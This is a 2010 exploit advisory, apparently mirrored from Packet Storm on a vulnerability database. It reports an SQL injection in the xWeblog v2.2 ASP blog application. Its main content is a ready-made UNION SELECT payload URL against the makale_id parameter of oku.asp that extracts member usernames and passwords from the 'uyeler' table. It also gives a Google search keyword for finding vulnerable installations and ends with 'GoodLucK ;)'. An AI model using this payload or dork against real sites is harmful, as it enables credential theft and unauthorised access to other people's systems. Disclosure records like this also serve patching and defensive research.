xWeblog 2.2 SQL Injection

🗓️ 08 Oct 2010 00:00:00Reported by KnocKoutType

packetstorm🔗 packetstormsecurity.com👁 14 Views

xWeblog v2.2 SQL Injection vulnerability in aspdunyasi web app with SQLi exploitatio

`===================================================  
xWeblog v2.2 - Remote SQL Injection Vulnerability (tr)  
===================================================  
  
~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
[+] Author : KnocKout  
[~] Contact : [email protected]  
~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
~Web App. : xWeblog v2.2  
~Software: http://www.aspdunyasi.com/goster.asp?id=19  
~Vulnerability Style : (SQLi)  
~Google Keywords : "XWEBLOG"  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
~~~~~~~~ Explotation ~~~~~~~~~~~  
  
SQL Injection  
================================  
http://TARGET/path/oku.asp?makale_id=-67%20UNION%20SELECT+0,AD,SIFRE,3,4,5,6,7,8,9,10,11,12%20from%20uyeler  
================================  
[+] SQL Injected!  
  
  
  
GoodLucK ;)  
  
  
# Inj3ct0r.com [2010-09-28]  
  
`

08 Oct 2010 00:00Current

7.4High risk

Vulners AI Score7.4